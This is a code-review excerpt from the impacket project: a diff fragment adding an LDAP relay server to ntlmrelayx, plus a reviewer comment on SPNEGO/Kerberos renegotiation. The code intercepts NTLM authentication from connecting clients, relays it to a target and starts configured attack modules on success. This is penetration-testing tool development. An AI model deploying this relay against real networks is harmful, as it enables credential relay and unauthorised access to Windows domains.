impacket/examples/ntlmrelayx/servers/ldaprelayserver.py

```diff
@@ -0,0 +1,385 @@
+            self.server.targetprocessor.registerTarget(self.server.target, False, username)
+            return
+
+        clientResponse, error_code = self.client.login(username, password)
+
+        if error_code == STATUS_SUCCESS:
+            logging.info("LDAP: Authentication successful!")
+            self.server.targetprocessor.registerTarget(self.server.target, True, username)
+            if self.server.target.scheme.upper() in self.server.config.attacks:
+                clientThread = self.server.config.attacks[self.server.target.scheme.upper()](self.server.config, self.client.session, username)
+                clientThread.start()
+        else:
+            logging.error("LDAP: Authentication failed!")
+            self.server.targetprocessor.registerTarget(self.server.target, False, username)
+
+        bind_response = ldapasn1.BindResponse()
+        bind_response['resultCode'] = ldapasn1.ResultCode('success')
+        bind_response['matchedDN'] = ''
+        bind_response['diagnosticMessage'] = ''
+        
+        response_ldap_message = ldapasn1.LDAPMessage()
+        response_ldap_message['messageID'] = ldap_message['messageID']
+        response_ldap_message['protocolOp']['bindResponse'] = bind_response
+        
+        self.conn.sendall(encoder.encode(response_ldap_message))
+
+    def handle_sicily_bind(self, ldap_message, auth_choice):
+        token = auth_choice.getComponent().asOctets()
+        logging.debug("LDAP: Received Sicily NTLM token: %r" % token)
+        from impacket.structure import hexdump
+        logging.debug("LDAP: Sicily NTLM token hexdump:\n%s" % hexdump(token))
+
+        if not token.startswith(b'NTLMSSP\x00'):
+            logging.error("Unknown NTLM message type")
+            return
+
+        message_type = struct.unpack('<L', token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
+        logging.debug("LDAP: NTLM message type: %d" % message_type)
+
+        if message_type == 0x01:  # NTLMSSP_NEGOTIATE
+            self.handle_negotiate(ldap_message, token, auth_type='sicily')
+        elif message_type == 0x03:  # NTLMSSP_AUTH
+            self.handle_auth(ldap_message, token)
+        else:
+            logging.error("Unknown NTLM message type: %d" % message_type)
+
+    def handle_spnego_bind(self, ldap_message, sasl_credentials):
+        token = sasl_credentials['credentials']
+        logging.debug("LDAP: Received SPNEGO NTLM token: %r" % token)
+        
+        if len(token) > 0:
+            try:
+                neg_token_init = decoder.decode(token.asOctets(), asn1Spec=SPNEGO_NegTokenInit())[0]
+                mech_token = neg_token_init['mechToken'].asOctets()
+            except:
+                # It's probably a NTLMSSP AUTH packet
+                mech_token = token.asOctets()
+
+            logging.debug("LDAP: Extracted mech_token: %r" % mech_token)
+            
+            # Search for the NTLMSSP header
+            ntlm_header = b'NTLMSSP\x00'
```

Comment:
this assumes that the client is sending the NTLMSSP header, but they could also just send their Kerberos ticket, and say that they also support NTLMSSP, for example on my windows 11:
<img width="1418" height="512" alt="image" src="https://github.com/user-attachments/assets/e6fbb137-13f4-40cf-84a6-63213715a7fc" />
Then we need to renegotiate.

Reply:
Just reading through the code this looks like it will work, but I'd need to set up an environment to test this. If someone else wants to try and beat me to it, it'd be much appreciated :)